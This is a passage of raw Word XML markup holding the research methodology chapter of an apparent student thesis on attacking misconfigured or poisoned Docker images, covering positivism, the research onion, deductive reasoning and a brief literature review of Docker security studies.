      </w:r>
    </w:p>
    <w:p w14:paraId="6548830D" w14:textId="77777777" w:rsidR="004D467B" w:rsidRPr="001C4FDA" w:rsidRDefault="004D467B" w:rsidP="001C4FDA"/>
    <w:p w14:paraId="491B73B5" w14:textId="77777777" w:rsidR="009F65E0" w:rsidRPr="009F65E0" w:rsidRDefault="009F65E0" w:rsidP="009F65E0"/>
    <w:p w14:paraId="7D8E2ACE" w14:textId="348B12CF" w:rsidR="003A0683" w:rsidRDefault="003A0683" w:rsidP="00E1117D"/>
    <w:p w14:paraId="10DEBEEC" w14:textId="77777777" w:rsidR="00314922" w:rsidRDefault="00314922" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4421EC9B" w14:textId="2B6E8A6B" w:rsidR="00314922" w:rsidRDefault="00314922" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4AC0EA7C" w14:textId="65F0790D" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="5560D80A" w14:textId="7F4CDC2F" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="42A7EE23" w14:textId="3F678051" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="00B287D5" w14:textId="5C11B923" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="2EF86DDA" w14:textId="0B9B05FC" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="55415A74" w14:textId="4738000A" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="4A6648B0" w14:textId="50FF6599" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="70E97A5E" w14:textId="4808558B" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="02C696D5" w14:textId="77777777" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00E1117D"/>
    <w:p w14:paraId="05B79CE8" w14:textId="77777777" w:rsidR="00416917" w:rsidRDefault="00416917" w:rsidP="00955EA7"/>
    <w:p w14:paraId="0AAF35B1" w14:textId="0DDB2D60" w:rsidR="00710FDE" w:rsidRDefault="00FB3BB3" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc87032914"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00AE7D5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RESEARCH </w:t>
      </w:r>
      <w:r w:rsidR="00C961D3">
        <w:t>METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidR="00C961D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C03DAB" w14:textId="2C68750C" w:rsidR="00AE7D5F" w:rsidRDefault="00AE7D5F" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc87032915"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="3E5F178A" w14:textId="4B8EC8E0" w:rsidR="00FB3BB3" w:rsidRDefault="00FF04E4" w:rsidP="00FB3BB3">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t>discuss</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t xml:space="preserve"> the research methods and approaches used to develop the research</w:t>
      </w:r>
      <w:r w:rsidR="00001CB2">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="004D0998">
        <w:t xml:space="preserve"> objectives and aims.</w:t>
      </w:r>
      <w:r w:rsidR="00113DF7">
        <w:t xml:space="preserve"> The project aim is to conduct security attacks on Docker environment using misconfigured or poisoned images.</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve"> This chapter outlines</w:t>
      </w:r>
      <w:r w:rsidR="005139B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>and discusses t</w:t>
      </w:r>
      <w:r w:rsidR="005139B5">
        <w:t xml:space="preserve">he research methodology </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>based on the research onion philosophy</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t>, including</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t xml:space="preserve">research approach, design, strategies, </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">process, data collection, and </w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve"> used in this study</w:t>
      </w:r>
      <w:r w:rsidR="00413B4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve">research methodology </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t>aims</w:t>
      </w:r>
      <w:r w:rsidR="00616C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">to provide the researcher </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">better familiarity with the project’s topic in </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t xml:space="preserve">concise and </w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t xml:space="preserve">systematic </w:t>
      </w:r>
      <w:r w:rsidR="00196133">
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidR="00082E5A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00395117">
        <w:t xml:space="preserve"> Such methods will provide the author with a clear structure of the road path to achieve the goals and objectives of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD09C6" w14:textId="381F78A3" w:rsidR="0027684B" w:rsidRDefault="0027684B" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc87032916"/>
      <w:r>
        <w:t>RESEARCH PHILOSOPHY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="2A63DF0E" w14:textId="4D19B683" w:rsidR="0027684B" w:rsidRDefault="00F76DFD" w:rsidP="0049220F">
      <w:r>
        <w:t xml:space="preserve">This project </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">aims to </w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t>experiment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00712E94">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>Docker environment with misconfigured images.</w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t xml:space="preserve"> In th</w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t>is case</w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C6CC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D7A60">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00306271">
        <w:t>ata will be collected and interpreted</w:t>
      </w:r>
      <w:r w:rsidR="002E58B9">
        <w:t xml:space="preserve"> during and after the </w:t>
      </w:r>
      <w:r w:rsidR="002F6C0A">
        <w:t>experiment</w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t xml:space="preserve">. Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0049220F">
        <w:t xml:space="preserve">positivism approach was used to deal with </w:t>
      </w:r>
      <w:r w:rsidR="00950A03">
        <w:t>data methodology. Positivism philosophy is a method that argues through scientific evidence, such as observation, experiment, and logical reasoning</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t xml:space="preserve"> to prove or formulate a hypothesis.</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t>his project</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> uses</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t>experiment</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>al method</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>examine</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>investigate</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> data, </w:t>
      </w:r>
      <w:r w:rsidR="0066454A">
        <w:t xml:space="preserve">involving observation with specific data, </w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t>and thus</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve"> the project’s philosophy lies in the positivism category</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="889228262"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:instrText xml:space="preserve"> CITATION BRM21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[80]</w:t>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00EA51FD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C962B7A" w14:textId="2CAB8670" w:rsidR="0066454A" w:rsidRDefault="0066454A" w:rsidP="001833CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718E4B92" wp14:editId="6BEE3671">
            <wp:extent cx="4984750" cy="30226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84750" cy="3022600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851C299" w14:textId="3DB40C72" w:rsidR="002417B0" w:rsidRPr="00D71273" w:rsidRDefault="001833CF" w:rsidP="00D71273">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc86858598"/>
      <w:bookmarkStart w:id="76" w:name="_Toc86867488"/>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Research onion</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1861816710"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION AMe18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[81]</w:t>
          </w:r>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="459AC53E" w14:textId="26BF46E4" w:rsidR="001833CF" w:rsidRDefault="001833CF" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc87032917"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RESEARCH APPROACH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="453EEE33" w14:textId="57248E51" w:rsidR="00197404" w:rsidRDefault="001E1D39" w:rsidP="001833CF">
      <w:r>
        <w:t xml:space="preserve">The research onion comprises two approaches: deductive and inductive. The deductive approach is </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve">used to test </w:t>
      </w:r>
      <w:r w:rsidR="004D33F3">
        <w:t xml:space="preserve">a hypothesis based </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve">on an existing theory, while </w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t>inductive</w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t xml:space="preserve"> approach</w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve"> is applied in developing a theory</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1237983287"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:instrText xml:space="preserve"> CITATION PKO07 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[82]</w:t>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005E3FBC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004D33F3">
        <w:t xml:space="preserve"> As for this project, deductive reasoning was applied </w:t>
      </w:r>
      <w:r w:rsidR="004B7513">
        <w:t>through an extensive literature review on pr</w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t>ior</w:t>
      </w:r>
      <w:r w:rsidR="004B7513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004163C6">
        <w:t>stud</w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="004163C6">
        <w:t xml:space="preserve">findings to validate </w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t xml:space="preserve">and test </w:t>
      </w:r>
      <w:r w:rsidR="009D1967">
        <w:t xml:space="preserve">the project’s hypothesis. The literature review was conducted on previous studies </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009D1967">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009D1967">
        <w:t xml:space="preserve"> the project’s topic to </w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t>grasp the methods and techniques used to conduct the experiment in achieving the project’s goals.</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> Thereby, deductive reasoning was used to prove or disprove the experimen</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t>tal</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> results</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t>comparing</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve">them </w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve"> studies.</w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t xml:space="preserve"> this project will deduct </w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t>conclusion with the help of the experimental research and data</w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve"> obtained</w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve"> The reasons why the researcher used </w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve">deductive approach for this project </w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve"> covered in the following sub-sections, prov</w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t xml:space="preserve">iding </w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t>supportive arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC5B34F" w14:textId="38A17BA6" w:rsidR="00C27030" w:rsidRDefault="00D9485D" w:rsidP="00C27030">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc87032918"/>
      <w:r>
        <w:t>Literature Reviews</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="26116DF1" w14:textId="3528229D" w:rsidR="00C27030" w:rsidRPr="00C27030" w:rsidRDefault="00C27030" w:rsidP="00C27030">
      <w:r>
        <w:t xml:space="preserve">According to Yasrib in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1792818874"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>, Docker is vulnerable to various security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="009C4F43">
        <w:t xml:space="preserve"> if used without appropriate configurations</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009C4F43">
        <w:t xml:space="preserve"> Based on prior research and theory, Yasrib hypothesised that Docker is vulnerable to security threats, such as Dos, ARP spoofing, MitM, poisoned images, </w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t xml:space="preserve">privilege attacks, </w:t>
      </w:r>
      <w:r w:rsidR="00140BD0">
        <w:t>etc. The author</w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t xml:space="preserve"> found support for his hypothesis from Docker documentation and other related works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5723F" w14:textId="027F76C6" w:rsidR="00C27030" w:rsidRPr="00C27030" w:rsidRDefault="00C27030" w:rsidP="00C27030">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc87032919"/>
      <w:r>
        <w:t xml:space="preserve">Experimental </w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pproach 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="4BF08A83" w14:textId="6DBF4963" w:rsidR="00D9485D" w:rsidRDefault="00D9485D" w:rsidP="001833CF">
      <w:r>
        <w:t xml:space="preserve">In a study by </w:t>
      </w:r>
      <w:r w:rsidR="00BA03D7">
        <w:t xml:space="preserve">Tomar and Jeena in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1549982279"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00857E0E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Docker security is not mature yet. The authors </w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>formulated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F01560">
        <w:t>their hypothesis from their literature review on previous works related to the topic.</w:t>
      </w:r>
      <w:r w:rsidR="00857E0E">
        <w:t xml:space="preserve"> Next, they tested the hypothesis by experimenting with Dos attack on Docker containers and analysing the data during and after the attack. With such an approach, their Dos attack was successful, supporting their hypothesis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA717C" w14:textId="6EFC341D" w:rsidR="005A58A5" w:rsidRDefault="005A58A5" w:rsidP="005A58A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
